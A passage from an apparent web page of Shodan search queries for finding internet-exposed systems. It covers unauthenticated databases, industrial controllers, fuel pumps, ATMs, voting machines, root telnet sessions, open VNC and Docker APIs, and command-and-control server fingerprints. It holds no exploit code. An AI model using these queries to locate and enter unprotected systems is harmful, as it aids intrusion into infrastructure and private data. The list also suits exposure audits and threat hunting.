C2'<br>product:"Axigen"<br>product:"besu"<br>product:"BGP"<br>product:"bitvise"<br>"product:\"Check Point Firewall\""<br>product:"Cisco fingerd"<br>product:"cloudflare-nginx"<br>product:"CouchDB"<br>"product:cups"<br>product:"CUPS (IPP)"<br>product:'DarkComet Trojan'<br>product:'DarkTrack RAT Trojan'<br>product:"Dropbear sshd"<br>product:"Erigon"<br>product:"Erlang Port Mapper Daemon"<br>product:"etcd"<br>"product:\"Exim smtpd\""<br>product:"Fortinet FortiWiFi"<br>product:"Geth"<br>product:"GitLab Self-Managed"<br>product:"GNU Inetutils FTPd"<br>product:"HttpFileServer httpd"<br>product:"IBM DB2 Database Server"<br>product:"jenkins"<br>product:"Kafka"<br>product:"kubernetes"<br>product:"Kubernetes" version:"1.21.5-eks-bc4871b"<br>product:"Linksys E2000 WAP http config"<br>product:"MikroTik router ftpd"<br>product:"MikroTik RouterOS API Service"<br>product:"Minecraft"<br>product:"MS .NET Remoting httpd"<br>product:"mysql"<br>product:"MySQL"<br>product:"Nethermind"<br>product:"Niagara Fox"<br>product:"nPerf"<br>product:OpenEthereum<br>product:"OpenResty"<br>product:"OpenSSH"<br>product:"Oracle TNS Listener"<br>product:"Oracle Weblogic"<br>product:'Orcus RAT Trojan'<br>"product:\"PostgreSQL\""<br>"product:\"ProFTPD\""<br>product:"ProFTPD"<br>product:"RabbitMQ"<br>product:"rhinosoft serv-u httpd"<br>product:"Riak"<br>product:"Sliver C2"<br>product:"TeamSpeak 3 ServerQuery"<br>product:"tomcat"<br>product:"VMware Authentication Daemon"<br>product:"vsftpd"<br>product:"Xlight ftpd"<br>product:'XtremeRAT Trojan'<br>'"python/3.10 aiohttp/3.8.3" &amp;&amp; bad status'<br>"r470t"<br>realm="karaf"<br>"RTM WEB"<br>"RT-N16"<br>RTSP/1.0<br>secmail<br>"SEH HTTP Server"<br>"Server: Boa/"<br>"Server: Burp Collaborator"<br>'Server: Cleo'<br>'Server: Cleo'<br>"Server: EC2ws"<br>'server: "ecstatic"'<br>'Server: Flowmon'<br>"Server: gabia"<br>"Server: GeoHttpServer"<br>'Server: Goliath'<br>'Server: httpd/2.0 port:8080'<br>'Server: mikrotik httpproxy'<br>'Server: Mongoose'<br>"Server: tinyproxy"<br>"Server: Trellix"<br>"Set-Cookie: MFPSESSIONID="<br>'set-cookie: nsbase_session'<br>sickbeard<br>smtp<br>SSH-2.0-AWS_SFTP_1.1<br>"SSH-2.0-MOVEit"<br>SSH-2.0-ROSSSH<br>ssl:"AsyncRAT Server"<br>ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS"<br>ssl.cert.serial:146473198<br>ssl.cert.subject.cn:"Onimai Academies CA"<br>ssl.cert.subject.cn:"Quasar Server CA"<br>ssl:"Covenant" http.component:"Blazor"<br>ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1+port:443<br>ssl:"Kubernetes Ingress Controller Fake Certificate"<br>ssl:"MetasploitSelfSignedCA"<br>ssl:"Mythic"<br>ssl:Mythic port:7443<br>ssl:"ou=fortianalyzer"<br>ssl:"ou=fortiauthenticator"<br>ssl:"ou=fortiddos"<br>ssl:"ou=fortigate"<br>ssl:"ou=fortimanager"<br>ssl:"P18055077"<br>'ssl:postalCode=3540 ssl.jarm:3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e'<br>ssl.version:sslv2 ssl.version:sslv3 ssl.version:tlsv1 ssl.version:tlsv1.1<br>"Statamic"<br>".styleci.yml"<br>The requested resource <br>"TIBCO Spotfire Server"<br>title:"3ware"<br>title:"Acunetix"<br>title:"AddOnFinancePortal"<br>title:"Administration login" html:"poste&lt;span"<br>title:"AdminLogin - MPFTVC"<br>title:"Advanced System Management"<br>title:"AeroCMS"<br>title:"AiCloud"<br>title:"Airflow - DAGs"<br>title:"Akuiteo"<br>title:"Alma Installation"<br>title:"Ambassador Edge Stack"<br>title:"AmpGuard wifi setup"<br>title:"Anaqua User Sign On""<br>title:"AnythingLLM"<br>title:"Apache APISIX Dashboard"<br>title:"Apache Apollo"<br>title:"Apache Drill"<br>title:"Apache Druid"<br>title:"Apache Miracle Linux Web Server"<br>title:"Apache Ozone"<br>title:"Apache Pinot"<br>title:"Apache Shiro Quickstart"<br>title:"apache streampipes"<br>title:"Apache Tomcat"<br>title:"APC | Log On"<br>title:"Appliance Management Console Login"<br>title:"Appliance Setup Wizard"<br>title:"Audiobookshelf"<br>title:"Automatisch"<br>title:"AutoSet"<br>title:"AWS X-Ray Sample Application"<br>title:"Axigen"<br>title:"Backpack Admin"<br>title:"Bamboo setup wizard"<br>title:"BigAnt"<br>title:"Biostar"<br>title:"Blackbox Exporter"<br>title:"BRAVIA Signage"<br>title:"BrightSign"<br>title:"Build Dashboard - Atlassian Bamboo"<br>title:"Businesso Installer"<br>title:"c3325"<br>title:"cAdvisor"<br>title:"Camaleon CMS"<br>title:"CAREL Pl@ntVisor"<br>"title:\"CData - API Server\""<br>"title:\"CData Arc\""<br>"title:\"CData Connect\""<br>"title:\"CData Sync\""<br>title:"Chamilo has not been installed"<br>title:"Change Detection"<br>title:"Choose your deployment type - Confluence"<br>title:"Cisco Unified"<br>title:"Cisco vManage"<br>title:"Cisco WebEx"<br>title:"Claris FileMaker WebDirect"<br>title:"CloudCenter Installer"<br>title:"CloudCenter Suite"<br>title:"Cloud Services Appliance"<br>title:"Codis • Dashboard"<br>title:"Collectd Exporter"<br>title:"Coming Soon"<br>title:"COMPALEX"<br>title:"Concourse"<br>title:"Configure ntop"<br>title:"Congratulations | Cloud Run"<br>title="ConnectWise Control Remote Support Software"<br>title:"copyparty"<br>title:"Cryptobox"<br>title:"CudaTel"<br>title:"cvsweb"<br>title:"CyberChef"<br>title:"Dashboard - Ace Admin"<br>title:"Dashboard - Bootstrap Admin Template"<br>title:"Dashboard - Confluence"<br>title:"Dashboard - ESPHome"<br>title:"Datadog"<br>title:"dataiku"<br>title:"Debug Config"<br>title:"Debugger"<br>"title=\"Decision Center | Business Console\""<br>title:"dedecms" || http.html:"power by dedecms"<br>title:"Default Parallels Plesk Panel Page"<br>title:"Dell Remote Management Controller"<br>title:"Deluge"<br>title:"Devika AI"<br>title:"Dialogic XMS Admin Console"<br>title:"Discourse Setup"<br>title:"Discuz!"<br>title:"D-LINK"<br>title:"Dockge"<br>title:"Docmosis Tornado"<br>title:"DokuWiki"<br>title:"Dolibarr install or upgrade"<br>title:"DPLUS Dashboard"<br>title:"DQS Superadmin"<br>title:"Dradis Professional Edition"<br>title:"DuomiCMS"<br>title:"Dynamics Container Host"<br>title:"EC2 Instance Information"<br>title:"Eclipse BIRT Home"<br>title:"Elastic HD Dashboard"<br>title:"Elemiz Network Manager"<br>title:"elfinder"<br>title:"Enablix"<br>title:"Encompass CM1 Home Page"<br>title:"Enterprise-Class Redis for Developers"<br>title:"Envoy Admin"<br>title:"EOS HTTP Browser"<br>title:"Error" html:"CodeIgniter"<br>title:"Eureka"<br>title:"Event Debug Server"<br>title:"EVlink Local Controller"<br>title:"Express Status"<br>title:"FASTPANEL HOSTING CONTROL"<br>title:"ffserver Status"<br>title:"FileGator"<br>title:"Flahscookie Superadmin"<br>title:"Flask + Redis Queue + Docker"<br>title:"Flexnet"<br>title:"Flex VNF Web-UI"<br>title:"FlureeDB Admin Console"<br>title:"FootPrints Service Core Login"<br>title:"For the Love of Music - Installation"<br>title:"FOSSBilling"<br>title:"Freshrss"<br>title:"Froxlor"<br>title:"Froxlor Server Management Panel"<br>title:"FusionAuth Setup Wizard"<br>title:"Gargoyle Router Management Utility"<br>title:"GEE Server"<br>title:"Geowebserver"<br>title:"Gira HomeServer 4"<br>title:"Gitblit"<br>title:"GitHub Enterprise"<br>title:"GitLab"<br>title:"GitList"<br>title:"GL.iNet Admin Panel"<br>title:"Global Traffic Statistics"<br>title:"Glowroot"<br>title:"Gopher Server"<br>title:"Gradio"<br>title:"Grafana"<br>title:"GraphQL Playground"<br>title:"Gravitino"<br>title:"Grav Register Admin User"<br>title:"Graylog Web Interface"<br>title:"Group-IB Managed XDR"<br>title:"H2O Flow"<br>title:"haproxy exporter"<br>title:"Health Checks UI"<br>title:"Hetzner Cloud"<br>title:"HFS /"<br>title:"Homebridge"<br>title:"Home - Mongo Express"<br>title:"Home Page - Select or create a notebook"<br>title:"Honeywell XL Web Controller"<br>title:"hookbot"<br>title:"hoteldruid"<br>title:"h-sphere"<br>title:"HUAWEI"<br>title:"Hue Personal"<br>title:"hue personal wireless lighting"<br>title:"Hue - Welcome to Hue"<br>title:"HugeGraph"<br>title:"Hybris"<br>title:"HyperTest"<br>title:"Icecast Streaming Media Server"<br>title:"icewarp"<br>title:"IDEMIA"<br>title:"i-MSCP - Multi Server Control Panel"<br>title:"Initial server configuration"<br>'title:"Installation -  Gitea: Git with a cup of tea"'<br>title:"Installation Moodle"<br>title:"Install Binom"<br>title:"Install concrete"<br>title:"Installing TYPO3 CMS"<br>title:"Install · Nagios Log Server"<br>title:"Install Umbraco"<br>title:"ISPConfig" http.favicon.hash:483383992<br>title:"issabel"<br>title:"ITRS"<br>title:"Jackett"<br>title:"Jamf Pro"<br>title:"JC-e converter webinterface"<br>title:"Jeecg-Boot"<br>title:"Jeedom"<br>title:"JIRA - JIRA setup"<br>title:"Jitsi Meet"<br>title:"Joomla Web Installer"<br>title:"JSON Server"<br>title:"JSPWiki"<br>title:"Juniper Web Device Manager"<br>title:"jupyter notebook"<br>title:"Kafka-Manager"<br>title:"keycloak"<br>title:"Kiali"<br>title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337<br>title:"KnowledgeTree Installer"<br>title:"Koel"<br>title:kubecost<br>title:Kube-state-metrics<br>title:"Lantronix"<br>title:"LDAP Account Manager"<br>title:"LibrePhotos"<br>title:"LibreSpeed"<br>title:"Libvirt"<br>title:"Lidarr"<br>title:"Liferay"<br>title:"Lightdash"<br>title:"LinkTap Gateway"<br>title:"Locust"<br>title:logger html:"htmlWebpackPlugin.options.title"<br>title:"Login - Authelia"<br>title:"Log in - Bitbucket"<br>title:"Login | Control WebPanel"<br>title:"Login | GYRA Master Admin"<br>title:"login" product:"Avtech"<br>title:"login" product:"Avtech AVN801 network camera"<br>title:"Log in | Telerik Report Server"<br>title:"Login to ICC PRO system"<br>title:"Login to TLR-2005KSH"<br>title:"LVM Exporter"<br>title:"MachForm Admin Panel"<br>title:"macOS Server"<br>title:"Magnolia Installation"<br>title:"Maltrail"<br>title:"MAMP"<br>title:"ManageEngine"<br>title:"ManageEngine Desktop Central"<br>title:"MantisBT"<br>title:"Matomo"<br>title:"Mautic"<br>title:"Metabase"<br>title:"Microsoft Azure Web App - Error 404"<br>title:"MinIO Console"<br>title:"mirth connect administrator"<br>title:"Mobotix"<br>title:"MobSF"<br>title:"Moleculer Microservices Project"<br>title:"MongoDB exporter"<br>'title:"Monstra :: Install"'<br>title:"Moodle"<br>title:"MySQLd exporter"<br>title:"myStrom"<br>title:"Nacos"<br>title:"Nagios XI"<br>title:"Named Process Exporter"<br>title:"NeoDash"<br>title:"Netdisco"<br>title:"Netman"<br>title:"netman 204"<br>title:"NetMizer"<br>"title:NextChat,\"ChatGPT Next Web\""<br>title:"NginX Auto Installer"<br>title="nginxwebui"<br>title:"Nifi"<br>"title:\"NiFi\""<br>title:"NiFi"<br>title:"NI Web-based Configuration &amp; Monitoring"<br>title:"NodeBB Web Installer"<br>title:"NoEscape - Login"<br>title:"Notion – One workspace. Every team."<br>title:"NP Data Cache"<br>title:"NPort Web Console"<br>title:"nsqadmin"<br>title:"Nuxeo Platform"<br>title:"O2 Easy Setup"<br>title=="O2OA"<br>title:"OCS Inventory"<br>title:"Odoo"<br>title:"Okta"<br>title:"OLT Web Management Interface"<br>title:"OneDev"<br>title:"OpenCart"<br>title:"opencats"<br>title:"OpenEMR Setup Tool"<br>title:"OpenMage Installation Wizard"<br>title:"OpenMediaVault"<br>title:"OpenNMS Web Console"<br>title:"openproject"<br>title:"OpenShift"<br>title:"OpenShift Assisted Installer"<br>title:"openSIS"<br>title:"OpenWRT"<br>title:"Oracle Application Server"<br>title:"Oracle Forms"<br>title:"Oracle Opera" &amp;&amp; html:"/OperaLogin/Welcome.do"<br>title:"Oracle PeopleSoft Sign-in"<br>title:"Orangescrum Setup Wizard"<br>title:"osticket"<br>title:"osTicket"<br>title:"Ovirt-Engine"<br>title:"owncloud"<br>title:"OXID eShop installation"<br>title:"Pa11y Dashboard"<br>title:"Pagekit Installer"<br>title:"PairDrop"<br>title:"Papercut"<br>'title:"Payara Micro #badassfish - Error report"'<br>title:"PCDN Cache Node Dataset"<br>title:"pCOWeb"<br>title:"Pega"<br>title:"perfSONAR"<br>title:" Permissions | Installer"<br>title:"Persis"<br>title:"PgHero"<br>title:"Pgwatch2"<br>title:"phpLDAPadmin"<br>title:"phpMemcachedAdmin"<br>title:"phpmyadmin"<br>title:"Pi-hole"<br>title:"Piwik › Installation"<br>title:"Plenti"<br>title:"Portainer"<br>title:"Postgres exporter"<br>title:"Powered by phpwind"<br>title:"Powered By vBulletin"<br>title:"PQube 3"<br>title:"PrestaShop Installation Assistant"<br>title:"Prison Management System"<br>title:"Pritunl"<br>title:"PrivateBin"<br>title:"PrivX"<br>title:"ProcessWire 3.x Installer"<br>title:"Pulsar Admin"<br>'title:"PuppetDB: Dashboard"'<br>title:"QlikView - AccessPoint"<br>title:"QuestDB · Console"<br>title:"RabbitMQ Exporter"<br>title:"Raspberry Shake Config"<br>title:"Ray Dashboard"<br>title:"rConfig"<br>title:"ReCrystallize"<br>title:"RedisInsight"<br>title:"Redpanda Console"<br>title:"Registration and Login System"<br>title:"Rekognition Image Validation Debug UI"<br>title:"reNgine"<br>title:"Reolink"<br>title:"Repetier-Server"<br>title:"ResourceSpace"<br>title:"Retool"<br>title:"RocketMQ"<br>title:"Room Alert"<br>title:"RStudio Sign In"<br>title:"ruckus"<br>"title:\"Rule Execution Server\""<br>title:"Rule Execution Server"<br>title:"Rundeck"<br>title:"Runtime Error"<br>title:"Rustici Content Controller"<br>title:"SaltStack Config"<br>title:"Sato"<br>title:"Scribble Diffusion"<br>title:"ScriptCase"<br>title:"SecurEnvoy"<br>title:SecuritySpy<br>title:"SelfCheck System Manager"<br>title:"SentinelOne - Management Console"<br>title:"Seq"<br>title:"SERVER MONITOR - Install"<br>title:"ServerStatus"<br>title:"servicenow"<br>title:"- setup" html:"Modem setup"<br>title:"Setup - mosparo"<br>title:"Setup wizard for webtrees"<br>title:"Setup Wizard" html:"/ruckus"<br>title:"Setup Wizard" html:"untangle"<br>title:"Setup Wizard" http.favicon.hash:-1851491385<br>title:"Setup Wizard" http.favicon.hash:2055322029<br>title:"ShareFile Storage Server"<br>title:"shenyu"<br>title:"Shopify App — Installation"<br>title:"shopware AG"<br>title:"ShopXO企业级B2C电商系统提供商"<br>title:"Sign In - Airflow"<br>title:"sitecore"<br>title:"Sitecore"<br>title:"Slurm HPC Dashboard"<br>title:"SmartPing Dashboard"<br>title:"SMF Installer"<br>title:"SmokePing Latency Page for Network Latency Grapher"<br>title:"Snoop Servlet"<br>title:"SoftEther VPN Server"<br>title:"Solr"<br>title:"Sonarqube"<br>title:"SonicWall Network Security"<br>title:"Speedtest Tracker"<br>title:"Splash"<br>title:"SqWebMail"<br>title:"Stremio-Jackett"<br>title:"Struts2 Showcase"<br>title:"Sugar Setup Wizard"<br>title:"SuiteCRM"<br>title:"SumoWebTools Installer"<br>title:"Superadmin UI - 4myhealth"<br>title:"SuperWebMailer"<br>title:"Symantec Endpoint Protection Manager"<br>title:"Synapse is running"<br>title:"SyncThru Web Service"<br>title:"System Properties"<br>title:"T24 Sign in"<br>title:"tailon"<br>title:"TamronOS IPTV系统"<br>title:"Tasmota"<br>title:"Tautulli - Welcome"<br>title:"TeamForge :"<br>title:"Tekton"<br>title:"TemboSocial Administration"<br>title:"Tenda Web Master"<br>title:"Teradek Cube Administrative Console"<br>title:"TestRail Installation Wizard"<br>title:"Thanos | Highly available Prometheus setup"<br>title:"ThinkPHP"<br>title:"THIS WEBSITE HAS BEEN SEIZED"<br>title:"Tigase XMPP Server"<br>title:"Tiki Wiki CMS"<br>title:"Tiny File Manager"<br>title:"Tiny Tiny RSS - Installer"<br>title:"TitanNit Web Control"<br>title:"tooljet"<br>title:"ToolJet - Dashboard"<br>title:"topaccess"<br>title:"Tornado - Login"<br>title:"Trassir Webview"<br>title:"Turbo Website Reviewer"<br>title:"TurnKey LAMP"<br>title:"ueditor"<br>title:"UniFi Wizard"<br>title:"uniGUI"<br>title:"Uptime Kuma"<br>title:"User Control Panel"<br>title:"USG FLEX"<br>title:"Utility Services Administration"<br>title:"UVDesk Helpdesk Community Edition - Installation Wizard"<br>title:"V2924"<br>title:"V2X Control"<br>"title:\"vBulletin\""<br>title:"veeam backup enterprise manager"<br>title:"Veeam Backup for GCP"<br>title:"Veeam Backup for Microsoft Azure"<br>title:"Veriz0wn"<br>title:"VideoXpert"<br>title:"Vitogate 300"<br>title:"VIVOTEK Web Console"<br>title:"vManage"<br>title:"VMware Appliance Management"<br>title:"VMware Aria Operations"<br>title:"VMware Carbon Black EDR"<br>title:"Vmware Cloud"<br>title:"VMware Cloud Director Availability"<br>title:"VMWARE FTP SERVER"<br>title:"VMware HCX"<br>title:"Vmware Horizon"<br>title:"VMware Site Recovery Manager"<br>title:"VMware VCenter"<br>title:"Vodafone Vox UI"<br>title:"vRealize Operations Manager"<br>title:"WAMPSERVER Homepage"<br>"title:\"Wazuh\""<br>title:"WebCalendar Setup Wizard"<br>title:"WebcomCo"<br>title:"Web Configurator"<br>title:"Web Configurator" html:"ACTi"<br>title:"Web File Manager"<br>title:"WebIQ"<br>title:"Webmin"<br>title:"Webmodule"<br>title:"WebPageTest"<br>title:"Webroot - Login"<br>title:"Webuzo Installer"<br>title:"Welcome to Azure Container Instances!"<br>title:"Welcome to C-Lodop"<br>title:"Welcome to Movable Type"<br>title:"Welcome to SmarterStats!"<br>title:"Welcome to your SWAG instance"<br>title:"WhatsUp Gold" http.favicon.hash:-2107233094<br>title:"WIFISKY-7层流控路由器"<br>title:"Wiki.js Setup"<br>title:"WorldServer"<br>title:"WoW-CMS | Installation"<br>title:"XenMobile"<br>"title:\"XenMobile - Console\""<br>title:"XEROX WORKCENTRE"<br>title:"xfinity"<br>title:"xnat"<br>title:"X-UI Login"<br>title:"Yellowfin Information Collaboration"<br>title:"Yii Debugger"<br>title:"Yopass"<br>title:"Your Own URL Shortener"<br>title:"YzmCMS"<br>title:"Zebra"<br>title:"Zend Server Test Page"<br>title:"Zenphoto install"<br>title:"Zeppelin"<br>title:"Zitadel"<br>title:"ZoneMinder"<br>title:"ZWave To MQTT"<br>title:"контроллер"<br>title:"孚盟云 "<br>title:"通达OA"<br>"Versa-Analytics-Server"<br>"wasabis3"<br>"/wd/hub"<br>"/websm/"<br>"Wing FTP Server"<br>"WL-500G"<br>"WL-520GU"<br>"workerman"<br>"WSO2 Carbon Server"<br>"www-authenticate:"<br>'www-authenticate: negotiate'<br>X-Amz-Server-Side-Encryption<br>"X-AspNetMvc-Version"<br>"X-AspNet-Version"<br>"X-ClickHouse-Summary"<br>"X-Influxdb-"<br>"X-Jenkins"<br>"X-Mod-Pagespeed:"<br>"X-Powered-By: Chamilo"<br>"X-Powered-By: Express"<br>"X-Powered-By: PHP"<br>"X-Recruiting:"<br>"X-TYPO3-Parsetime: 0ms"<br></code></pre> <h3>city:</h3> <p>Find devices in a particular city. <code>city:"Bangalore"</code></p> <h3>country:</h3> <p>Find devices in a particular country. <code>country:"IN"</code></p> <h3>geo:</h3> <p>Find devices by giving geographical coordinates. <code>geo:"56.913055,118.250862"</code></p> <h3>Location</h3> <p><code>country:us</code> <code>country:ru country:de city:chicago</code></p> <h3>hostname:</h3> <p>Find devices matching the hostname. <code>server: "gws" hostname:"google"</code> <code>hostname:example.com -hostname:subdomain.example.com</code> <code>hostname:example.com,example.org</code></p> <h3>net:</h3> <p>Find devices based on an IP address or /x CIDR. <code>net:210.214.0.0/16</code></p> <h3>Organization</h3> <p><code>org:microsoft</code> <code>org:"United States Department"</code></p> <h3>Autonomous System Number (ASN)</h3> <p><code>asn:ASxxxx</code></p> <h3>os:</h3> <p>Find devices based on operating system. <code>os:"windows 7"</code></p> <h3>port:</h3> <p>Find devices based on open ports. <code>proftpd port:21</code></p> <h3>before/after:</h3> <p>Find devices before or after between a given time. <code>apache after:22/02/2009 before:14/3/2010</code></p> <h3>SSL/TLS Certificates</h3> <p>Self signed <a href="https://www.kitploit.com/search/label/Certificates" target="_blank" title="certificates">certificates</a> <code>ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com</code></p> <p>Expired certificates <code>ssl.cert.expired:true</code></p> <p><code>ssl.cert.subject.cn:example.com</code></p> <h3>Device Type</h3> <p><code>device:firewall</code> <code>device:router</code> <code>device:wap</code> <code>device:webcam</code> <code>device:media</code> <code>device:"broadband router"</code> <code>device:pbx</code> <code>device:printer</code> <code>device:switch</code> <code>device:storage</code> <code>device:specialized</code> <code>device:phone</code> <code>device:"voip"</code> <code>device:"voip phone"</code> <code>device:"voip adaptor"</code> <code>device:"load balancer"</code> <code>device:"print server"</code> <code>device:terminal</code> <code>device:remote</code> <code>device:telecom</code> <code>device:power</code> <code>device:proxy</code> <code>device:pda</code> <code>device:bridge</code></p> <h3>Operating System</h3> <p><code>os:"windows 7"</code> <code>os:"windows server 2012"</code> <code>os:"linux 3.x"</code></p> <h3>Product</h3> <p><code>product:apache</code> <code>product:nginx</code> <code>product:android</code> <code>product:chromecast</code></p> <h3>Customer Premises Equipment (CPE)</h3> <p><code>cpe:apple</code> <code>cpe:microsoft</code> <code>cpe:nginx</code> <code>cpe:cisco</code></p> <h3>Server</h3> <p><code>server: nginx</code> <code>server: apache</code> <code>server: microsoft</code> <code>server: cisco-ios</code></p> <h3>ssh fingerprints</h3> <p><code>dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0</code></p> <h1>Web</h1> <h3>Pulse Secure</h3> <p><code>http.html:/dana-na</code></p> <h3>PEM Certificates</h3> <p><code>http.title:"Index of /" http.html:".pem"</code></p> <h3>Tor / Dark Web sites</h3> <p><code>onion-location</code></p> <h1>Databases</h1> <h3>MySQL</h3> <p><code>"product:MySQL"</code> <code>mysql port:"3306"</code></p> <h3>MongoDB</h3> <p><code>"product:MongoDB"</code> <code>mongodb port:27017</code></p> <h3>Fully open MongoDBs</h3> <p><code>"MongoDB Server Information { "metrics":"</code> <code>"Set-Cookie: mongo-express=" "200 OK"</code> <code>"MongoDB Server Information" port:27017 -authentication</code></p> <h3>Kibana dashboards without authentication</h3> <p><code>kibana content-legth:217</code></p> <h3>elastic</h3> <p><code>port:9200 json</code> <code>port:"9200" all:elastic</code> <code>port:"9200" all:"elastic indices"</code></p> <h3>Memcached</h3> <p><code>"product:Memcached"</code></p> <h3>CouchDB</h3> <p><code>"product:CouchDB"</code> <code>port:"5984"+Server: "CouchDB/2.1.0"</code></p> <h3>PostgreSQL</h3> <p><code>"port:5432 PostgreSQL"</code></p> <h3>Riak</h3> <p><code>"port:8087 Riak"</code></p> <h3>Redis</h3> <p><code>"product:Redis"</code></p> <h3>Cassandra</h3> <p><code>"product:Cassandra"</code></p> <h1>Industrial Control Systems</h1> <h3>Samsung Electronic Billboards</h3> <p><code>"Server: Prismview Player"</code></p> <h3>Gas Station Pump Controllers</h3> <p><code>"in-tank inventory" port:10001</code></p> <h3>Fuel Pumps connected to internet:</h3> <p>No auth required to access CLI terminal. <code>"privileged command" GET</code></p> <h3>Automatic License Plate Readers</h3> <p><code>P372 "ANPR enabled"</code></p> <h3>Traffic Light Controllers / Red Light Cameras</h3> <p><code>mikrotik streetlight</code></p> <h3>Voting Machines in the United States</h3> <p>"voter system serial" country:US</p> <h3>Open ATM:</h3> <p>May allow for ATM Access availability <code>NCR Port:"161"</code></p> <h3>Telcos Running Cisco Lawful Intercept Wiretaps</h3> <p><code>"Cisco IOS" "ADVIPSERVICESK9_LI-M"</code></p> <h3>Prison Pay Phones</h3> <p><code>"[2J[H Encartele Confidential"</code></p> <h3>Tesla PowerPack Charging Status</h3> <p><code>http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2</code></p> <h3>Electric Vehicle Chargers</h3> <p><code>"Server: gSOAP/2.8" "Content-Length: 583"</code></p> <h3>Maritime Satellites</h3> <p>Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!</p> <p><code>"Cobham SATCOM" OR ("Sailor" "VSAT")</code></p> <h3>Submarine Mission Control Dashboards</h3> <p><code>title:"Slocum Fleet Mission Control"</code></p> <h3>CAREL PlantVisor Refrigeration Units</h3> <p><code>"Server: CarelDataServer" "200 Document follows"</code></p> <h3>Nordex Wind Turbine Farms</h3> <p><code>http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"</code></p> <h3>C4 Max Commercial Vehicle GPS Trackers</h3> <p><code>"[1m[35mWelcome on console"</code></p> <h3>DICOM Medical X-Ray Machines</h3> <p>Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.</p> <p><code>"DICOM Server Response" port:104</code></p> <h3>GaugeTech Electricity Meters</h3> <p><code>"Server: EIG Embedded Web Server" "200 Document follows"</code></p> <h3>Siemens Industrial Automation</h3> <p><code>"Siemens, SIMATIC" port:161</code></p> <h3>Siemens HVAC Controllers</h3> <p><code>"Server: Microsoft-WinCE" "Content-Length: 12581"</code></p> <h3>Door / Lock Access Controllers</h3> <p><code>"HID VertX" port:4070</code></p> <h3>Railroad Management</h3> <p><code>"log off" "select the appropriate"</code></p> <h3>Tesla Powerpack charging Status:</h3> <p>Helps to find the charging status of tesla powerpack. <code>http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2</code></p> <h3>XZERES Wind Turbine</h3> <p><code>title:"xzeres wind"</code></p> <h3>PIPS Automated License Plate Reader</h3> <p><code>"html:"PIPS Technology ALPR Processors""</code></p> <h3>Modbus</h3> <p><code>"port:502"</code></p> <h3>Niagara Fox</h3> <p><code>"port:1911,4911 product:Niagara"</code></p> <h3>GE-SRTP</h3> <p><code>"port:18245,18246 product:"general electric""</code></p> <h3>MELSEC-Q</h3> <p><code>"port:5006,5007 product:mitsubishi"</code></p> <h3>CODESYS</h3> <p><code>"port:2455 operating system"</code></p> <h3>S7</h3> <p><code>"port:102"</code></p> <h3>BACnet</h3> <p><code>"port:47808"</code></p> <h3>HART-IP</h3> <p><code>"port:5094 hart-ip"</code></p> <h3>Omron FINS</h3> <p><code>"port:9600 response code"</code></p> <h3>IEC 60870-5-104</h3> <p><code>"port:2404 asdu address"</code></p> <h3>DNP3</h3> <p><code>"port:20000 source address"</code></p> <h3>EtherNet/IP</h3> <p><code>"port:44818"</code></p> <h3>PCWorx</h3> <p><code>"port:1962 PLC"</code></p> <h3>Crimson v3.0</h3> <p><code>"port:789 product:"Red Lion Controls"</code></p> <h3>ProConOS</h3> <p><code>"port:20547 PLC"</code></p> <h1>Remote Desktop</h1> <h3>Unprotected VNC</h3> <p><code>"authentication disabled" port:5900,5901</code> <code>"authentication disabled" "RFB 003.008"</code></p> <h3>Windows RDP</h3> <p>99.99% are secured by a secondary Windows login screen.</p> <p><code>"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"</code></p> <h1>C2 Infrastructure</h1> <h3>CobaltStrike Servers</h3> <p><code>product:"cobalt strike team server"</code> <code>product:"Cobalt Strike Beacon"</code> <code>ssl.cert.serial:146473198</code> - default certificate serial number <code>ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1</code> <code>ssl:foren.zik</code></p> <h3>Brute Ratel</h3> <p><code>http.html_hash:-1957161625</code> <code>product:"Brute Ratel C4"</code></p> <h3>Covenant</h3> <p><code>ssl:"Covenant" http.component:"Blazor"</code></p> <h3>Metasploit</h3> <p><code>ssl:"MetasploitSelfSignedCA"</code></p> <h1>Network Infrastructure</h1> <h3>Hacked routers:</h3> <p>Routers which got compromised <code>hacked-router-help-sos</code></p> <h3>Redis open instances</h3> <p><code>product:"Redis key-value store"</code></p> <h3>Citrix:</h3> <p>Find Citrix Gateway. <code>title:"citrix gateway"</code></p> <h3>Weave Scope Dashboards</h3> <p>Command-line access inside <a href="https://www.kitploit.com/search/label/Kubernetes" target="_blank" title="Kubernetes">Kubernetes</a> pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.</p> <p><code>title:"Weave Scope" http.favicon.hash:567176827</code></p> <h3>Jenkins CI</h3> <p><code>"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"</code></p> <h3>Jenkins:</h3> <p>Jenkins Unrestricted Dashboard <code>x-jenkins 200</code></p> <h3>Docker APIs</h3> <p><code>"Docker Containers:" port:2375</code></p> <h3>Docker Private Registries</h3> <p><code>"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab</code></p> <h3>Pi-hole Open DNS Servers</h3> <p><code>"dnsmasq-pi-hole" "Recursion: enabled"</code></p> <h3>DNS Servers with recursion</h3> <p><code>"port: 53" Recursion: Enabled</code></p> <h3>Already Logged-In as root via Telnet</h3> <p><code>"root@" port:23 -login -password -name -Session</code></p> <h3>Telnet Access:</h3> <p>NO password required for telnet access. <code>port:23 console gateway</code></p> <h3>Polycom video-conference system no-auth shell</h3> <p><code>"polycom command shell"</code></p> <h3>NPort serial-to-eth / MoCA devices without password</h3> <p><code>nport -keyin port:23</code></p> <h3>Android Root Bridges</h3> <p>A tangential result of Google's sloppy fractured update approach. 🙄 More information here.</p> <p><code>"Android Debug Bridge" "Device" port:5555</code></p> <h3>Lantronix 